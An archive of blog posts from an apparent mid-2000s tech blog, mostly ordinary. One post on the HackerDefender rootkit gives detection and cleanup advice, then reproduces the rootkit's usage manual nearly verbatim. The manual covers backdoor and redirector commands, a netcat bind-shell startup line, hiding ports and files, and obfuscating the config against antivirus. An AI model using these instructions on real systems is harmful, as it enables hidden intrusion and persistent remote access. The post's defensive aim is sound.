Longhorn M7.2 Bits

Longhorn Milestone 7.2 (M7.2) bits were handed out at WinHEC. Per Chris Sells, MSDN subscribers should be seeing this soon. You can check out some of the reviews from the WinHEC participants here.

I am now rubbing my hands gleefully and eager to get my hands on it – have to wait for it to show up on the subscriber download at MSDN – will need a new HDD then :). Let’s see if my small demos for Tiles survive or not – with the PDC build, I run out of memory and finally have to reboot.

What is a Loosely Coupled System?

In a loosely coupled system (e.g. a Service Oriented Architecture, i.e. SOA), each dependency is either a Real Dependency or an Artificial Dependency.

Real dependencies are the services you need to fulfil your need; these cannot be eliminated or reduced.

Artificial dependencies, on the other hand, are the features you must adhere to in order to consume the services you need. Typically these fall into the categories of platform dependencies, API dependencies, language, etc. Although artificial dependencies cannot be eliminated, they can be reduced.

A loosely coupled application is one that minimises its Artificial Dependencies.

Visual Basic at the Movies

Quite funny; check it out if you have got the time. 🙂 If you rate the movie, you can get a FREE copy of Visual Basic.NET

Hacker Defender

A friend’s (Phil Kerkel) laptop recently got infected with HackerDefender which cost him about a day’s worth of work. Now this seems to be harmless, but something like this invading the system is scary, especially when you have all your data and not to mention in most cases a lot of our client’s data!

Basically, these guys use the FTP services installed on Windows machines running on high speed networks (such as DSL/Cable, or University campuses) so they can use that fat pipe to distribute copyrighted material such as films, games and software etc. Sometimes these FTP servers are protected by a piece of software called HackerDefender; this software is used to hide files, processes and even ports from the user and investigating parties and is particularly difficult to infiltrate.

Detecting It:

If a remote port scan says that a port is open and that port can be ftp’d into, but aports (http://bagpuss.swan.ac.uk/comms/aports.exe) does not display the port locally, you can pretty much assume a version of HackerDefender is installed.
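
The cross-view check described above, as an added example that is not from the original post: it compares the open TCP ports seen by a scan run from another machine with the listening ports the suspect host reports about itself. The nmap grepable line, the netstat capture, the addresses and the function names are constructed for illustration.

```python
import re

# Constructed sample: one `nmap -oG -` result line from a scan run on ANOTHER machine.
REMOTE_SCAN = (
    "Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, "
    "135/filtered/tcp//msrpc///, 3131/open/tcp/////\tIgnored State: closed (996)\n"
)

# Constructed sample: `netstat -an` output captured ON the suspect host.
LOCAL_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.0.2.10:139         0.0.0.0:0              LISTENING
  TCP    192.0.2.10:80          198.51.100.7:51514     ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

_NETSTAT_ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s*$", re.I)


def remote_open_ports(grepable, proto="tcp"):
    """Ports the outside scanner saw as open (nmap grepable format)."""
    ports = set()
    for line in grepable.splitlines():
        if "Ports:" not in line:
            continue
        # The port list ends at the next tab-separated field.
        port_field = line.split("Ports:", 1)[1].split("\t")[0]
        for entry in port_field.split(","):
            fields = entry.strip().split("/")
            if (len(fields) >= 3 and fields[0].isdigit()
                    and fields[1] == "open" and fields[2] == proto):
                ports.add(int(fields[0]))
    return ports


def local_listening_ports(netstat_text):
    """TCP ports the host itself admits to listening on."""
    ports = set()
    for line in netstat_text.splitlines():
        match = _NETSTAT_ROW.match(line)
        if match:
            ports.add(int(match.group(2)))
    return ports


def hidden_port_candidates(grepable, netstat_text):
    """Open from the outside but missing from the local view: worth investigating."""
    return sorted(remote_open_ports(grepable) - local_listening_ports(netstat_text))


if __name__ == "__main__":
    for port in hidden_port_candidates(REMOTE_SCAN, LOCAL_NETSTAT):
        print(f"tcp/{port}: reachable remotely, not reported locally")
```

A port listed here can also be explained by a NAT or port-forwarding device sitting between the scanner and the host, so scan from the same network segment before drawing conclusions.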

How to Clean It:

Boot windows into Rescue mode, do one of the following:

Insert the Windows OS Installation CD into the Drive.

  • Boot from the CD
  • Choose ‘R’ to enter the Rescue Console
  • Choose the Windows installation you want to Clean from the list presented to you.
  • Enter the Administrator Password.

Once in the recovery console, you have a few commands for this, including:

listsvc    – lists services that can be enabled or disabled

enable   – enables a service, with a service type,

  • SERVICE_DISABLED
  • SERVICE_BOOT_START
  • SERVICE_SYSTEM_START
  • SERVICE_AUTO_START
  • SERVICE_DEMAND

disable – disables a service, but prints out the previous start-type, which should be recorded in case you need to re-enable the service.

Clean up Trojans/payloads protected by HackerDefender:

Once the machine has rebooted, search the registry for the name of the service that you disabled in the previous section. This should lead you to the executable for HackerDefender and, more importantly, its .ini file (not necessarily a .ini file; it may have a different extension).

Open/Edit the ini file and in there you should find a number of files, ports and services that HackerDefender is defending.  Systematically find each of these services in the registry and delete them (they will probably appear more than once), likewise find all of the referenced files and delete them also.

It’s also worth having a look in the registry for ‘run on boot’ programs too; go to this key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Have a look for any of these and delete them if they are present…

  • “spoolsvr.exe”=-
  • “Kernel32”=-
  • “GLSetIT32”=-
  • “iTouch.exe”=-
  • “Localsys.exe”=-
  • “explorer.exe”=-
  • “msiexe.exe”=-
  • “service”=-

Here is the .ini file from Phil (he was running Win2K); as you scan this you will see more things you should look out for:

[Hidden Table]
inatjoy.dll
motkrtin.dll
witadr.dll
winunins.exe
winunins.ini
svhost.exe
CWShredder*
HijackThis*
ProceXP*
Spybot*
msconfig*

[Root Processes]
svhost.exe
trj4j6js.exe
winunins.exe

[Hidden Services]
HackerDefender*

[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100

[Hidden RegValues]

[Startup Run]
C:\WINNT\svhost.exe -sr -0

[Free Space]

[Hidden Ports]

[Settings]
Password=qweqwe
BackdoorShell=ddd.exe
FileMappingName=_.-=[PokuS]=-._
ServiceName=HackerDefender100
ServiceDisplayName=Windows System Uninstaller
ServiceDescription=Microsoft System Service
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys

[Comments]
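
One way to turn a recovered inifile into the cleanup list described above, as an added example (not code from the original post or from hxdef). It applies the rules from the Inifile section of the readme quoted further down: the characters | < > : \ / " are ignored outside [Startup Run], [Free Space], [Hidden Ports] and [Settings] values, matching is case-insensitive, and everything after the first * is dropped. The function names and the abridged, partly obfuscated sample are constructed for illustration.

```python
EXTRA = set('|<>:\\/"')   # characters hxdef ignores, per its readme
RAW_SECTIONS = {"startup run", "free space", "hidden ports"}   # read literally

# Constructed sample: abridged from the .ini shown above; the obfuscated
# header/items and the [Hidden Ports] entries are added to exercise the parser.
SAMPLE_INI = r'''
[H<<<idden T>>a/"ble]
>s"vhost.exe
winunins.*ignored
HijackThis*
[Root Processes]
trj4j6js.exe
[Hidden Services]
HackerDefender*
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
[Startup Run]
C:\WINNT\svhost.exe -sr -0
%cmd%?/c echo started>> %tmpdir%starttime.txt
[Hidden Ports]
TCP:8080,456
UDP:
[Settings]
Service/Name=HackerDefender100
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
'''


def _strip_extra(text):
    return "".join(ch for ch in text if ch not in EXTRA).strip()


def parse_hxdef_ini(text):
    """Return {section: [items]}, with 'settings' as a dict, de-obfuscated."""
    ini, current = {"settings": {}}, None
    for raw in text.splitlines():
        line = raw.strip()
        cleaned = _strip_extra(line)
        if not cleaned:
            continue
        if cleaned.startswith("[") and cleaned.endswith("]"):
            current = cleaned[1:-1].strip().lower()
            if current != "settings":
                ini.setdefault(current, [])
        elif current is None:
            continue                              # text before the first section
        elif current == "settings":
            key, _, value = line.partition("=")   # only the key is de-obfuscated
            ini["settings"][_strip_extra(key)] = value.strip()
        elif current in RAW_SECTIONS:
            ini[current].append(line)
        else:
            item = cleaned.lower()
            if "*" in item:                       # text after the first * is ignored
                item = item[: item.index("*") + 1]
            ini[current].append(item)
    return ini


def is_hidden(name, patterns):
    """True if a file/process/service name matches a (trailing-*) pattern."""
    name = name.lower()
    return any(name.startswith(p[:-1]) if p.endswith("*") else name == p
               for p in patterns)


def cleanup_checklist(ini):
    """Names to search for in the registry and on disk during cleanup."""
    settings = ini["settings"]
    names = [settings[k] for k in ("ServiceName", "DriverName") if settings.get(k)]
    # Each service/driver name also has a LEGACY_<NAME> key (registry is case-insensitive).
    reg = {n.lower() for n in names} | {"legacy_" + n.lower() for n in names}
    reg |= set(ini.get("hidden regkeys", []))
    ports = {}
    for line in ini.get("hidden ports", []):
        proto, _, rest = line.partition(":")
        ports[proto.strip().lower()] = [int(p) for p in rest.split(",")
                                        if p.strip().isdigit()]
    # Program and arguments are separated by '?' in [Startup Run].
    startup = [tuple(part.strip() for part in entry.partition("?")[::2])
               for entry in ini.get("startup run", [])]
    return {
        "names_to_hunt": sorted(set(ini.get("hidden table", [])
                                    + ini.get("root processes", []))),
        "service_patterns": ini.get("hidden services", []),
        "registry_key_names": sorted(reg),
        "driver_file": settings.get("DriverFileName"),
        "startup": startup,
        "hidden_ports": ports,
    }


if __name__ == "__main__":
    for field, value in cleanup_checklist(parse_hxdef_ini(SAMPLE_INI)).items():
        print(f"{field}: {value}")
```

Run it against a copy of the inifile taken from the offline disk; `is_hidden` can then be applied to a directory or service listing from that same offline view to flag the entries the rootkit was concealing.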

The COOL Stuff:

Now, this is the cool part. I found this from another site and don’t want to link to them because who knows what they are running, so this is essentially a copy and paste from them! This is basically how the Trojan works, and it is showing what exploits it used, what APIs and how you can “improve on it”. A very interesting read, but I would recommend not using any of this for other than your own learning!

Essentially everything below is copy and paste with very minor edits:

=====[ 2. Introduction ]=====================================

Hacker defender (hxdef) is rootkit for Windows NT 4.0, Windows 2000 and Windows XP, it may also work on latest NT based systems. Main code is written in Delphi 6. New functions are written in assembler. Driver code is written in C. Backdoor and redirector clients are coded mostly in Delphi 6.

program uses adapted LDE32
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05

program uses Superfast/Supertiny Compression/Encryption library
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.

=====[ 2.1 Idea ]=====================================

The main idea of this program is to rewrite few memory segments in all running processes. Rewriting of some basic modules cause changes in processes behaviour. Rewriting must not affect the stability of the system or running processes. 

Program must be absolutely hidden for all others. Now the user is able to hide files, processes, system services, system drivers, registry keys and values, open ports, cheat with free disk space. Program also masks its changes in memory and hides handles of hidden processes. Program installs hidden backdoors, register as hidden system service and installs hidden system driver. The technology of backdoor allowed to do the implantation of redirector.

=====[ 2.2 Licence ]=====================================

 This project in version 1.0.0 is open source.

 And of course authors are not responsible for what you’re doing with  Hacker defender.

=====[ 3. Usage ]=====================================

 Usage of hxdef is quite simple:

 >hxdef100.exe [inifile]
or
 >hxdef100.exe [switch]

Default name for inifile is EXENAME.ini where EXENAME is the name of executable of main program without extension. This is used if you run hxdef without specifying the inifile or if you run it with switch (so default inifile is hxdef100.ini).

 These switches are available:

 -:installonly – only install service, but not run
 -:refresh – use to update settings from inifile
 -:noservice – doesn’t install services and run normally
 -:uninstall – removes hxdef from the memory and kills all
    running backdoor connections
    stopping hxdef service does the same now

Example:
 >hxdef100.exe -:refresh

Hxdef with its default inifile is ready to run without any change in inifile. But it’s highly recommended to create your own settings. See Inifile section for more information about inifile.

Switches -:refresh and -:uninstall can be called only from original exefile. This means you have to know the name and path of running hxdef exefile to change settings or to uninstall it.

=====[ 4. Inifile ]=====================================

Inifile must contain nine parts: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports] and [Settings]. In [Hidden Table], [Root Processes], [Hidden Services] and [Hidden RegValues] can be used character * as the wildcard in place of strings end.

Asterisk can be used only on strings end, everything after first asterisks is ignored. All spaces before first and after last another string characters are ignored.

Example:
[Hidden Table]
hxdef*

this will hide all files, dirs and processes which name start with “hxdef”.

Hidden Table is a list of files, directories and processes which should be hidden. All files and directories in this list will disappear from file managers. Programs in this list will be hidden in tasklist. Make sure main file, inifile, your backdoor file and driver file are mentioned in this list.

Root Processes is a list of programs which will be immune against infection. You can see hidden files, directories and programs only with these root programs. So, root processes are for rootkit admins. To be mentioned in Root Processes doesn’t mean you’re hidden. It is possible to have root process which is not hidden and vice versa.

Hidden Services is a list of service and driver names which will be hidden in the database of installed services and drivers. Service name for the main rootkit program is HackerDefender100 as default, driver name for the main rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.

Hidden RegKeys is a list of registry keys which will be hidden. Rootkit has four keys in registry: HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 as default. If you rename service name or driver name you should also change this list.

First two registry keys for service and driver are the same as its name. Next two are LEGACY_NAME. For example if you change your service name to BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.

Hidden RegValues is a list of registry values which will be hidden.

Startup Run is a list of programs which rootkit run after its startup. These programs will have same rights as rootkit. Program name is divided from its arguments with question tag. Do not use " characters. Programs will terminate after user logon. Use common and well known methods for starting programs after user logon. You can use following shortcuts here:
 %cmd%  – stands for system shell executable + path
     (e.g. C:\winnt\system32\cmd.exe)
 %cmddir% – stands for system shell executable directory
     (e.g. C:\winnt\system32\)
 %sysdir% – stands for system directory
     (e.g. C:\winnt\system32\)
 %windir% – stands for Windows directory
     (e.g. C:\winnt\)
 %tmpdir% – stands for temporary directory
     (e.g. C:\winnt\temp\)

Example:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

netcat-shell is run after rootkit startup and listens on port 100

2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt

this will put a time stamp to temporary_directory\starttime.txt (e.g. C:\winnt\temp\starttime.txt) every time rootkit starts (%TIME% works only with Windows 2000 and higher)

Free Space is a list of harddrives and a number of bytes you want to add to a free space. The list item format is X:NUM where X stands for the drive letter and NUM is the number of bytes that will be added to its number of free bytes.

Example:
[Free Space]
C:123456789

this will add about 123 MB more to shown free disk space of disk C

Hidden Ports is a list of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at most 2 lines. First line format is TCP:tcpport1,tcpport2,tcpport3 …, second line format is UDP:udpport1,udpport2,udpport3 …

Example:
1)
[Hidden Ports]
TCP:8080,456

this will hide two ports: 8080/TCP and 456/TCP

2)
[Hidden Ports]
TCP:8001
UDP:12345

this will hide two ports: 8001/TCP and 12345/UDP

3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800

this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP

Settings contains eight values: Password, BackdoorShell, FileMappingName, ServiceName, ServiceDisplayName, ServiceDescription, DriverName and DriverFileName.

Password which is 16 character string used when working with backdoor or redirector. Password can be shorter, rest is filled with spaces.

BackdoorShell is name for file copy of the system shell which is created by backdoor in temporary directory.

FileMappingName is the name of shared memory where the settings for hooked processes are stored. 

ServiceName is the name of rootkit service. ServiceDisplayName is display name for rootkit service. 

ServiceDescription is description for rootkit service. DriverName is the name for hxdef driver. 

DriverFileName is the name for hxdef driver file.

Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefá$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
 
This means your backdoor password is “hxdef-rulez”, backdoor will copy system shell file (usually cmd.exe) to “hxdefá$.exe” to temp. Name of shared memory will be “_.-=[Hacker Defender]=-._”. Name of a service is “HackerDefender100”, its display name is “HXD Service 100”, its description is “powerful NT rootkit”. Name of a driver is “HackerDefenderDrv100”. Driver will be stored in a file called “hxdefdrv.sys”.

Extra characters |, <, >, :, \, / and " are ignored on all lines except [Startup Run], [Free Space] and [Hidden Ports] items and values in [Settings] after first = character. Using extra characters you can make your inifile immune from antivirus systems.

Example:
[H<<<idden T>>a/"ble]
>h"xdef"*

is the same as

[Hidden Table]
hxdef*

see hxdef100.ini and hxdef100.2.ini for more examples

All strings in inifile except those in Settings and Startup Run are case insensitive.

=====[ 5. Backdoor ]=====================================

Rootkit hooks some API functions connected with receiving packets from the net. If incoming data equals to 256 bits long key, password and service are verified, the copy of a shell is created in a temp, its instance is created and next incoming data are redirected to this shell.

Because rootkit hooks all process in the system all TCP ports on all servers will be backdoors. For example, if the target has port 80/TCP open for HTTP, then this port will also be available as a backdoor. Exception here is for ports opened by System process which is not hooked. This backdoor will work only on servers where incoming buffer is larger or equal to 256 bits. But this feature is on almost all standard servers like Apache, IIS, Oracle.

Backdoor is hidden because its packets go through common servers on the system. So, you are not able to find it with classic portscanner and this backdoor can easily go through firewall. Exception in this are classic proxies which are protocol oriented for e.g. FTP or HTTP.

During tests on IIS services was found that HTTP server does not log any of this connection, FTP and SMTP servers log only disconnection at the end. So, if you run hxdef on server with IIS web server, the HTTP port is probably the best port for backdoor connection on this machine.

You have to use special client if want to connect to the backdoor. Program bdcli100.exe is used for this.

Usage: bdcli100.exe host port password

Example:
 >bdcli100.exe www.windowsserver.com 80 hxdef-rulez

this will connect to the backdoor if you rooted www.windowsserver.com before and left default hxdef password.

Client for version 1.0.0 is not compatible with servers in older version.

=====[ 5.1 Redirector ]=====================================

Redirector is based on backdoor technology. First connection packets are same as in backdoor connection. That mean you use same ports as for backdoor. Next packets are special packets for redirector only. These packets are made by redirectors base which is run on users computer. First packet of redirected connection defines target server and port.

The redirectors base saves its settings into its inifile which name depends on base exefile name (so default is rdrbs100.ini). If this file doesn’t exist when base is run, it is created automatically. It is better not to modify this inifile externally. All settings can be changed from base console.

If we want to use redirector on server where rootkit is installed, we have to run redirectors base on localhost before. Then in base console we have to create mapped port routed to server with hxdef. Finally we can connect on localhost base on chosen port and transferring data. Redirected data are coded with rootkit password. In this version connection speed is limited with about 256 kBps. Redirector is not determined to be used for high-speed connections in this version. Redirector is also limited with system where rootkit run. Redirector works with TCP protocol only.

In this version the base is controlled with 19 commands. These are not case sensitive. Their function is described in HELP command. During the base startup are executed commands in startup-list. Startup-list commands are edited with commands which start with SU.

Redirector differentiate between two connection types (HTTP and other). If connection is other type packets are not changed. If it is HTTP type Host parameter in HTTP header is changed to the target server. Maximum redirectors count on one base is 1000.

Redirector base fully works only on NT boxes. Only on NT program has tray icon and you can hide console with HIDE command. Only on NT base can be run in silent mode where it has no output, no icon and it does only commands in startup-list.

Examples:
1) getting mapped port info

 >MPINFO
 No mapped ports in the list.

2) add command MPINFO to startup-list and get startup-list commands:

 >SUADD MPINFO
 >sulist
 0) MPINFO

3) using of HELP command:

 >HELP
 Type HELP COMMAND for command details.
 Valid commands are:
 HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL,
 DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
 >HELP ADD
 Create mapped port. You have to specify domain when using HTTP type.
 usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET
 SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
 >HELP EXIT
 Kill this application. Use DIS flag to discard unsaved data.
 usage: EXIT [DIS]

4) add mapped port, we want to listen on localhost on port 100, rootkit is installed on server 200.100.2.36 on port 80, target server is www.google.com on port 80, rootkits password is bIgpWd, connection type is HTTP, ip address of target server (www.google.com) – we always have to know its ip – is 216.239.53.100:

 >ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

command ADD can be run without parameters, in this case we are asked for every parameter separately

5) now we can check mapped ports again with MPINFO:
 
 >MPINFO
 There are 1 mapped ports in the list. Currently 0 of them open.

6) enumeration of mapped port list:

 >LIST
 000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

7) detailed description of one mapped port:
 
 >DETAIL 0
 Listening on port: 100
 Mapping server address: 200.100.2.36
 Mapping server port: 80
 Target server address: 216.239.53.100
 Target server port: 80
 Password: bIgpWd
 Port type: HTTP
 Domain name for HTTP Host: www.google.com
 Current state: CLOSED

8) we can test whether the rootkit is installed with out password on mapping server 200.100.2.36 (but this is not needed if we are sure about it):

 >TEST 0
 Testing 0) 200.100.2.36:80:bIgpWd – OK

if test failed it returns
 
 Testing 0) 200.100.2.36:80:bIgpWd – FAILED

9) port is still closed and before we can use it, we have to open it with OPEN command, we can close port with CLOSE command when it is open, we can use flag ALL when want to apply these commands on all ports in the list, current state after required action is written after a while:
 
 >OPEN 0
 Port number 0 opened.
 >CLOSE 0
 Port number 0 closed.

or

 >OPEN ALL
 Port number 0 opened.
 
10) to save current settings and lists we can use SAVE command, this saves all to inifile (saving is also done by command EXIT without DIS flag):
 
 >SAVE
 Saved successfully.

Open port is all what we need for data transfer. Now you can open your favourite explorer and type http://localhost:100/ as url. If no problems you will see how main page on www.google.com is loaded.

First packets of connection can be delayed up to 5 seconds, but others are limited only by speed of server, your internet connection speed and by redirector technology which is about 256 kBps in this version.

=====[ 6.2 Hooked API ]=====================================

List of API functions which are hooked:

Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5 and 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA

Clippy

If you have had enough of Clippy, check this out. Not suitable for those with an aversion to profanity!

India's secret army of online ad 'clickers'

Now this probably has to fall in the News of the Weird category. I would probably have fallen asleep, drooling on the computer, which would have caused something to short circuit and then blow up the machine, and eventually get the house on fire. Hence, not worth losing your house over this.

Living La Vida Longhorn

You probably already heard this, but Chris Sells has a new column on MSDN called Longhorn Foghorn, that describes each of the “Pillars of Longhorn” – this is something which IMHO developers would understand and appreciate. In the first article he explains the “Pillars” and then in the next two goes on to build Solitaire. You can download the sample and play with it too.

Date/Time Issue with gmail

Karan found this and you can read about all of it in his blog. But I checked and he is right! Gmail does not show me the time of the “origin” of the email only when gmail got it. So taking Karan’s scenario:

  1. Retrieve from external pop3 mailbox
  2. 250 new messages
  3. Import 250 Messages
  4. look at inbox, and you have 250 messages received at the same time (1 min ago)
  5. Oh wow! this is just what I need.

This begs the question, is this by design? If so, would it be to thwart the spammers? Personally I would like to see both when was the mail sent, and when did I get it.

Thoughts?

Shadowfax

Shadowfax is an interesting set of “Reference Solution” that is being worked on by the PAG group at Microsoft. I think this would be a very important piece in the whole SOA (Service Oriented Architecture) space, with getting bits out the door in a quick and reusable fashion. Basically this is a similar implementation of Indigo in today’s technologies (i.e. those that are currently shipping such as .NET). This “unifies” the four messaging options you have today:

  1. Web Services
  2. Remoting
  3. MSMQ
  4. DCOM

Per Microsoft, the goals for this are:

  1. Enable separation between stable service interfaces and possibly volatile and unreliable Service Dispatching (Without the framework one would have to think about how to expose the service first. With the framework one can build a service first and then think about how to expose it.)
  2. Make it possible for developers to keep aspect-like logic, for example monitoring or auditing logic, separate from Service Dispatching logic.
  3. Provide a single, consistent mode of handling service requests regardless of the transport on which they came.
  4. Help developers build robust services that can be accessed by client applications through multiple transports.

This is how it translates to Architecture speak:

  1. Provide support for sending service request and receiving service responses over multiple transports (such as Web Services or message queue transport)
  2. Provide multiple, configurable means of dispatching Service Dispatchings.
  3. Provide multiple, configurable means of passing requests to and receiving responses from Service Dispatchings.
  4. Provide configurable means of “inserting” aspect-like logic into request and response flow.
  5. Provide simple means of integration with BizTalk orchestration

And the constraints within which this has to operate are:

  • The architecture must be logically consistent with the future direction of relevant Microsoft products (Indigo and BizTalk in particular).
  • The implementation should use the .NET Framework.  To be deployed, the architecture must only require the Windows platform with the .NET Framework distributable installed.
  • The development and modifications of the framework should be done with VS 2003 Enterprise Version.

Again, I think this would be quite a significant advantage before Indigo ships. I just started playing with this, so look out for more details on this in the next few weeks.

Hardware Error Codes

I suddenly started getting an error during boot up on one of my machines and could not figure out what it was. After spending a fair amount of time on Google, I found this listing of error codes that I feel was very helpful. You can bookmark this post and use it as your reference.

Code  Description
01x   Undetermined problem errors
02x   Power supply errors

1xx     System Board Errors
   101  System board error – Interrupt failure
   102  System board error – Timer failure
   103  System board error – Timer interrupt failure
   104  System board error – Protected mode failure
   105  System board error – Last 8042 command not accepted
   106  System board error – Converting logic test
   107  System board error – Hot NMI test
   108  System board error – Timer bus test
   109  Direct memory access test error
   110  System board memory
   111  Adapter memory
   112  (any adapter in system unit)
   113  (any adapter in system unit)
   121  Unexpected hardware interrupts occurred
   131  Cassette wrap test failed
   151  System Board Error; Defective battery
   152  System Board Error; Real time clock failure
   161  System Options Error – (Run SETUP) Battery failure
   162  System options not set correctly-(Run SETUP)
   163  Time and date not set – (Run SETUP)
   164  Memory size error – (Run SETUP)
   165  System options not set – (Run SETUP)
   166  (any adapter in system unit)
   199  User-indicated configuration not correct

2xx    Memory (RAM) Errors
xxyyyy yyzz 201 bad ram chip in bank xx row zz

   201  Memory test failed
   202  Memory address error
   203  Memory address error
   215  (system board memory failure)
   216  (system board memory failure)

3xx    Keyboard Errors

   301  Keyboard did not respond to software reset correctly, or a stuck key failure was detected. If a stuck key was detected, the scan code for the key is displayed in hexadecimal. For example, the error code 49 301 indicates that Key 73, the PAGE UP key, has failed (49 hex = 73 decimal)

   302  User-indicated error from the keyboard test, or AT keylock is locked
   303  Keyboard or system unit error
   304  Keyboard or system unit error; CMOS does not match system
   305  Models 50 and 60 fuse or keyboard cable error
   341  Replace keyboard
   342  Replace interface cable
   343  Replace enhancement card or cable

4xx    Monochrome Monitor Errors
   401  Monochrome memory test, horizontal synchronous frequency test, or video test failed
   408  User-indicated display attributes failure
   416  User-indicated character set failure
   424  User-indicated 80 X 25 mode failure
   432  Parallel port test failed (monochrome adapter)

5xx    Color Monitor Errors
   501  Color memory test failed, horizontal synchronous frequency test, or video test failed
   508  User-indicated display attribute failure
   516  User-indicated character set failure
   524  User-indicated 80 X 25 mode failure
   532  User-indicated 40 X 25 mode failure
   540  User-indicated 320 X 200 graphics mode failure
   548  User-indicated 640 X 200 graphics mode failure

6xx    Floppy Disk Drive Errors
   601  Disk power-on diagnostics test failed
   602  Disk test failed; boot record is not valid
   603  Disk size error
   606  Disk verify function failed
   607  Write-protected disk
   608  Bad command disk status returned
   610  Disk initialization failed
   611  Timeout – disk status returned
   612  Bad NEC (controller) – disk status returned
   613  Bad DMA – disk status returned
   614  DMA Boundary error
   621  Bad seek – disk status returned
   622  Bad CRC – disk status returned
   623  Record not found – disk status returned
   624  Bad address mark – disk status returned
   625  Bad NEC (controller) seek – disk status returned
   626  Disk data compare error
   627  Disk change line error
   628  Disk removed

7xx    8087 or 80287 Math Coprocessor Errors
   701  Math coprocessor test failed

9xx    Parallel Printer Adapter Errors
   901  Parallel printer adapter test failed

10xx    Reserved for Parallel Printer Adapter
  1001  Alt printer Adapter test failed

11xx   Asynchronous Communications Adapter Errors
  1101 Asynchronous communications adapter test failed
  1102 Any serial device (system board)
  1106 Any serial device (system board)
  1107 Communications cable (system board)
  1108 Any serial device (system board)
  1109 Any serial device (system board)
  1110 Modem status register not clear
  1111 Ring indicate failure
  1112 Trailing edge ring indicate failure
  1113 Receive and delta receive line signal detect failure
  1114 Receive line signal detect failure
  1115 Delta receive line signal detect failure
  1116 Line control register; all bits cannot be set
  1117 Line control register; all bits cannot be reset
  1118 Xmit holding and/or shift register is stuck on
  1119 Data ready stuck on
  1120 Interrupt enable register, all bits cannot be set
  1121 Interrupt enable register, all bits cannot be reset
  1122 Interrupt pending stuck on
  1123 Interrupt ID register stuck on
  1124 Modem control register, all bits cannot be set
  1125 Modem control register, all bits cannot be reset
  1126 Modem status register, all bits cannot be set
  1127 Modem status register, all bits cannot be reset
  1128 Interrupt ID failure
  1129 Cannot force overrun error
  1130 No modem status interrupt
  1131 Invalid interrupt pending
  1132 No data ready
  1133 No data available interrupt
  1134 No transmit holding interrupt
  1135 No interrupts
  1136 No received line status interrupt
  1137 No receive data available
  1138 Transmit holding register not empty
  1139 No modem status interrupt
  1140 Transmit holding register not empty
  1141 No interrupts
  1142 No IRQ4 interrupt
  1143 No IRQ3 interrupt
  1144 No data transferred
  1145 Maximum BAUD rate failed
  1146 Minimum BAUD rate failed
  1148 Timeout error
  1149 Invalid data returned
  1150 Modem status register error
  1151 No DSR and Delta DSR
  1152 No data set ready
  1153 No delta
  1154 Modem status register not clear
  1155 No CTS and Delta CTS
  1156 No clear to send
  1157 No delta CTS

12xx   Alternate Asynchronous Communications Adapter Errors
  1201 Alternate asynchronous communications adapter test failed
  1202 Dual Asynchronous Adapter/A (Any serial device)
  1206 Dual Asynchronous Adapter/A (Any serial device)
  1207 Dual Asynchronous Adapter/A board error
  1208 Dual Asynchronous Adapter/A (Any serial device)
  1209 Dual Asynchronous Adapter/A (Any serial device)

13xx   Game Control Adapter Errors
  1301 Game control adapter test failed
  1302 Joystick test failed

14xx   Printer Errors
  1401 Printer test failed
  1404 Matrix printer failed

15xx   Synchronous Data Link Control (SDLC) Communications Adapter Errors
  1510 8255 Port B failure
  1511 8255 Port A failure
  1512 8255 Port C failure
  1513 8253 Timer 1 did not reach terminal count
  1514 8253 Timer 1 stuck on
  1515 8253 Timer 0 did not reach terminal count
  1516 8253 Timer 0 stuck on
  1517 8253 Timer 2 did not reach terminal count
  1518 8253 Timer 2 stuck on
  1519 8273 Port B error
